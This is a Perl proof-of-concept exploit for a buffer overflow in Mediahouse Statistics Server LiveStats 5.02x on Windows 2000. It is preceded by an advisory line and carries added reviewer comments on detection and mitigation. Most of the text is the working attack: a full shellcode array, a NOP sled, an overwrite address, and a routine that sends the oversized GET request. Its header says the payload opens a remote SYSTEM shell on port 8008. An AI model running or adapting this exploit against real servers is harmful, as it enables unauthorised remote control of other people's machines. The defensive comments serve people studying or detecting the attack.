source: http://www.securityfocus.com/bid/1568/info Mediahouse Statistics Server LiveStats is susceptible to a buffer overflow attack if a URL in a GET request contains over 2030 bytes. Depending on the data inserted into the request, the application will crash or can be forced to execute arbitrary code.
#!/usr/bin/perl -w
# Statistics Server 5.02x's exploit.
# usage: ./ssexploit502x.pl hostname port
# 00/08/10
# http://www.deepzone.org
# http://deepzone.cjb.net
# http://mareasvivas.cjb.net (|Zan homepage)
#
# --|Zan <[email protected]>
# ----------------------------------------------------------------
#
# This exploit works against Statistics Server 5.02x/Win2k.
#
# Tested with Win2k (spanish version).
#
# It spawns a remote winshell on 8008 port. It doesn't kill
# webserver so webserver continues running while hack is made.
# When hack is finished webserver will run perfectly too.
#
# Default installation gives us a remote shell with system
# privileges.
#
# overflow discovered by
# -- Nemo <[email protected]>
#
# exploit coded by
# -- |Zan <[email protected]>
#
# ----------------------------------------------------------------
#
# NOTE(review): historical proof-of-concept (2000) for BID 1568, kept for
# reference. The script runs under -w only; there is no 'use strict', so
# $host, $port, $s, $item and $cont below are all package globals.
# What it sends, as visible in bofit(): a single request line made of
# "GET http://O" + @crash + 840 x 0x90 + 4 literal bytes, then CRLF CRLF.
# That is roughly 2 KB, above the ~2030-byte URL length the advisory
# names as the trigger.
# Detection/mitigation notes: an HTTP request line of this size, with no
# HTTP-version token and a long run of 0x90 bytes, is trivially
# distinguishable from legitimate traffic; enforce a request-line length
# limit at the server or at a proxy in front of it, and restrict inbound
# access to any port the payload is said to listen on (8008 per the header
# comment above, not verified here).

use IO::Socket;

# Payload bytes exactly as published; bofit() sends them one byte per
# print() call. The header comment says the payload opens a shell on
# TCP 8008; the bytes are not disassembled or verified here. The long
# run of 0x99 towards the end is what makes this payload easy to
# signature on the wire.
@crash = (
    "\x68","\x8b","\x41","\x1d","\x01","\x68","\x41","\x41","\x41",
    "\x41","\x68","\x61","\x41","\x41","\x41","\x58","\x59","\x5f",
    "\x2b","\xc1","\xaa","\x33","\xc9","\x66","\xb9","\x71","\x04",
    "\x90","\x90","\x90","\x68","\xbd","\x3e","\x1d","\x01","\x5e",
    "\x56","\x5f","\x33","\xd2","\x80","\xc2","\x99","\xac","\x32",
    "\xc2","\xaa","\xe2","\xfa","\x71","\x99","\x99","\x99","\x99",
    "\xc4","\x18","\x74","\xaf","\x89","\xd9","\x99","\x14","\x2c",
    "\xd4","\x8a","\xd9","\x99","\x14","\x24","\xcc","\x8a","\xd9",
    "\x99","\xf3","\x9e","\x09","\x09","\x09","\x09","\xc0","\x71",
    "\x4b","\x9b","\x99","\x99","\x14","\x2c","\x1c","\x8a","\xd9",
    "\x99","\x14","\x24","\x17","\x8a","\xd9","\x99","\xf3","\x93",
    "\x09","\x09","\x09","\x09","\xc0","\x71","\x23","\x9b","\x99",
    "\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d","\xd9","\x99",
    "\xcf","\x14","\x2c","\x87","\x8d","\xd9","\x99","\xcf","\x14",
    "\x2c","\xbb","\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x17",
    "\x8a","\xd9","\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d",
    "\xd9","\x99","\xcf","\x14","\x2c","\xbf","\x8d","\xd9","\x99",
    "\xcf","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\xcf","\x66",
    "\x0c","\x17","\x8a","\xd9","\x99","\x5e","\x1c","\xb7","\x8d",
    "\xd9","\x99","\xdd","\x99","\x99","\x99","\x14","\x2c","\xb7",
    "\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x0b","\x8a","\xd9",
    "\x99","\x14","\x2c","\xff","\x8d","\xd9","\x99","\x34","\xc9",
    "\x66","\x0c","\x37","\x8a","\xd9","\x99","\x14","\x2c","\xf3",
    "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x37","\x8a",
    "\xd9","\x99","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\x14",
    "\x24","\xff","\x8d","\xd9","\x99","\x3c","\x14","\x2c","\x87",
    "\x8d","\xd9","\x99","\x34","\x14","\x24","\xf3","\x8d","\xd9",
    "\x99","\x32","\x14","\x24","\xf7","\x8d","\xd9","\x99","\x32",
    "\x5e","\x1c","\xc7","\x8d","\xd9","\x99","\x99","\x99","\x99",
    "\x99","\x5e","\x1c","\xc3","\x8d","\xd9","\x99","\x98","\x98",
    "\x99","\x99","\x14","\x2c","\xeb","\x8d","\xd9","\x99","\xcf",
    "\x14","\x2c","\xb7","\x8d","\xd9","\x99","\xcf","\xf3","\x99",
    "\xf3","\x99","\xf3","\x89","\xf3","\x98","\xf3","\x99","\xf3",
    "\x99","\x14","\x2c","\x1b","\x8d","\xd9","\x99","\xcf","\xf3",
    "\x99","\x66","\x0c","\x0f","\x8a","\xd9","\x99","\xf1","\x99",
    "\xb9","\x99","\x99","\x09","\xf1","\x99","\x9b","\x99","\x99",
    "\x66","\x0c","\x07","\x8a","\xd9","\x99","\x10","\x1c","\x13",
    "\x8d","\xd9","\x99","\xaa","\x59","\xc9","\xd9","\xc9","\xd9",
    "\xc9","\x66","\x0c","\xcc","\x8a","\xd9","\x99","\xc9","\xc2",
    "\xf3","\x89","\x14","\x2c","\x9b","\x8d","\xd9","\x99","\xcf",
    "\xca","\x66","\x0c","\xc0","\x8a","\xd9","\x99","\xf3","\x9a",
    "\xca","\x66","\x0c","\xc4","\x8a","\xd9","\x99","\x14","\x2c",
    "\x17","\x8d","\xd9","\x99","\xcf","\x14","\x2c","\x9b","\x8d",
    "\xd9","\x99","\xcf","\xca","\x66","\x0c","\xf8","\x8a","\xd9",
    "\x99","\x14","\x24","\x0b","\x8d","\xd9","\x99","\x32","\xaa",
    "\x59","\xc9","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
    "\xc9","\xc9","\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99",
    "\x34","\xc9","\x66","\x0c","\x03","\x8a","\xd9","\x99","\xf3",
    "\xa9","\x66","\x0c","\x33","\x8a","\xd9","\x99","\x72","\xd4",
    "\x09","\x09","\x09","\xaa","\x59","\xc9","\x14","\x24","\x07",
    "\x8d","\xd9","\x99","\xce","\xc9","\xc9","\xc9","\x14","\x2c",
    "\xbb","\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03",
    "\x8a","\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a",
    "\xd9","\x99","\x1a","\x24","\x07","\x8d","\xd9","\x99","\x9b",
    "\x96","\x1b","\x8e","\x98","\x99","\x99","\x18","\x24","\x07",
    "\x8d","\xd9","\x99","\x98","\xb9","\x99","\x99","\xeb","\x97",
    "\x09","\x09","\x09","\x09","\x5e","\x1c","\x07","\x8d","\xd9",
    "\x99","\x99","\xb9","\x99","\x99","\xf3","\x99","\x12","\x1c",
    "\x07","\x8d","\xd9","\x99","\x14","\x24","\x07","\x8d","\xd9",
    "\x99","\xce","\xc9","\x12","\x1c","\x13","\x8d","\xd9","\x99",
    "\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99","\x34","\xc9",
    "\x66","\x0c","\x3b","\x8a","\xd9","\x99","\xf3","\xa9","\x66",
    "\x0c","\x33","\x8a","\xd9","\x99","\x12","\x1c","\x07","\x8d",
    "\xd9","\x99","\xf3","\x99","\xc9","\x14","\x2c","\x13","\x8d",
    "\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
    "\x99","\x34","\xc9","\x66","\x0c","\xfc","\x8a","\xd9","\x99",
    "\xf3","\x99","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
    "\xf3","\x99","\xf3","\x99","\xf3","\x99","\x14","\x2c","\xbb",
    "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03","\x8a",
    "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
    "\x99","\xaa","\x50","\xa0","\x14","\x07","\x8d","\xd9","\x99",
    "\x96","\x1e","\xfe","\x66","\x66","\x66","\xf3","\x99","\xf1",
    "\x99","\xb9","\x99","\x99","\x09","\x14","\x2c","\x13","\x8d",
    "\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
    "\x99","\x34","\xc9","\x66","\x0c","\xf0","\x8a","\xd9","\x99",
    "\x10","\x1c","\x03","\x8d","\xd9","\x99","\xf3","\x99","\x14",
    "\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x14","\x2c",
    "\x13","\x8d","\xd9","\x99","\x34","\xc9","\x14","\x2c","\xbf",
    "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3f","\x8a",
    "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
    "\x99","\xf3","\x99","\x12","\x1c","\x03","\x8d","\xd9","\x99",
    "\x14","\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x12",
    "\x1c","\x13","\x8d","\xd9","\x99","\xc9","\x14","\x2c","\xbb",
    "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3b","\x8a",
    "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
    "\x99","\x70","\x90","\x67","\x66","\x66","\x14","\x2c","\x0b",
    "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\xf4","\x8a",
    "\xd9","\x99","\x14","\x2c","\x0f","\x8d","\xd9","\x99","\x34",
    "\xc9","\x66","\x0c","\xf4","\x8a","\xd9","\x99","\xf3","\x99",
    "\x66","\x0c","\x2b","\x8a","\xd9","\x99","\xc8","\xcf","\xf1",
    "\x6d","\x39","\xdc","\x99","\xc3","\x66","\x8b","\xc9","\xc2",
    "\xc0","\xce","\xc7","\xc8","\xcf","\xca","\xf1","\xe5","\x38",
    "\xdc","\x99","\xc3","\x66","\x8b","\xc9","\x35","\x1d","\x59",
    "\xec","\x62","\xc1","\x32","\xc0","\x7b","\x73","\x5a","\xce",
    "\xca","\xd6","\xda","\xd2","\xaa","\xab","\x99","\xea","\xf6",
    "\xfa","\xf2","\xfc","\xed","\x99","\xfb","\xf0","\xf7","\xfd",
    "\x99","\xf5","\xf0","\xea","\xed","\xfc","\xf7","\x99","\xf8",
    "\xfa","\xfa","\xfc","\xe9","\xed","\x99","\xea","\xfc","\xf7",
    "\xfd","\x99","\xeb","\xfc","\xfa","\xef","\x99","\xfa","\xf5",
    "\xf6","\xea","\xfc","\xea","\xf6","\xfa","\xf2","\xfc","\xed",
    "\x99","\xd2","\xdc","\xcb","\xd7","\xdc","\xd5","\xaa","\xab",
    "\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xf0",
    "\xe9","\xfc","\x99","\xde","\xfc","\xed","\xca","\xed","\xf8",
    "\xeb","\xed","\xec","\xe9","\xd0","\xf7","\xff","\xf6","\xd8",
    "\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xeb",
    "\xf6","\xfa","\xfc","\xea","\xea","\xd8","\x99","\xc9","\xfc",
    "\xfc","\xf2","\xd7","\xf8","\xf4","\xfc","\xfd","\xc9","\xf0",
    "\xe9","\xfc","\x99","\xde","\xf5","\xf6","\xfb","\xf8","\xf5",
    "\xd8","\xf5","\xf5","\xf6","\xfa","\x99","\xcb","\xfc","\xf8",
    "\xfd","\xdf","\xf0","\xf5","\xfc","\x99","\xce","\xeb","\xf0",
    "\xed","\xfc","\xdf","\xf0","\xf5","\xfc","\x99","\xca","\xf5",
    "\xfc","\xfc","\xe9","\x99","\xda","\xf5","\xf6","\xea","\xfc",
    "\xd1","\xf8","\xf7","\xfd","\xf5","\xfc","\x99","\xdc","\xe1",
    "\xf0","\xed","\xcd","\xf1","\xeb","\xfc","\xf8","\xfd","\x99",
    "\x9b","\x99","\x86","\xd1","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x95","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x98","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\xda","\xd4","\xdd","\xb7","\xdc","\xc1","\xdc",
    "\x99","\x99","\x99","\x99","\x99","\x89","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x90","\x90");
# -------------------------------------------------------------------

# Parse the command line: exactly two positional arguments, host and port.
# Dies with a usage message otherwise. Assigns the package globals $host
# and $port that bofit() reads. The port is not checked for being numeric;
# a bad value only surfaces when IO::Socket::INET->new fails.
sub pcommands {
    die "usage: $0 hostname port\n" if (@ARGV != 2);
    ($host) = shift @ARGV;
    ($port) = shift @ARGV;
}

# Print the author's banner to STDOUT. No other side effects.
sub show_credits {
    print "\n\n\t (c) 2000 Deep Zone - Statistics Server 5.02x's exploit\n";
    print "\n\t\t Coded by |Zan - izan\@deepzone.org\n";
    print "\n\t-=[ http://www.deepzone.org - http://deepzone.cjb.net ]=-\n\n";
}

# Open a TCP connection to $host:$port, write the oversized request line,
# then relay whatever the server writes back until it closes the socket.
# Dies with "error.\n" if the connection cannot be opened ($! is not shown).
sub bofit {
    print "\nspawning remote shell on port 8008 ...\n\n";
    $s = IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>"tcp");
    if(!$s) { die "error.\n"; }
    # Request line opens with an absolute URL; everything that follows is
    # the overlong URL the advisory describes.
    print $s "GET http://O";
    # One print() per element; each @crash element is a one-byte string.
    foreach $item (@crash) { print $s $item }
    # 840 bytes of 0x90 between the payload and the final four bytes.
    for ($cont=0; $cont<840;$cont++) { print $s "\x90" }
    # Four literal bytes that end the URL; presumably the value that lands on
    # the overwritten return address (little-endian) — not verified here.
    print $s "\x8c\x3e\x1d\x01";
    # End of request line and of headers. No HTTP-version token and no
    # Host header are sent, which is itself a useful detection feature.
    print $s "\r\n\r\n";
    # Copy the server's reply, if any, to STDOUT until EOF.
    while (<$s>) { print }
    print "... done.\n\n";
}

# ----- begin
show_credits;
pcommands;
bofit;
# ----- that's all :)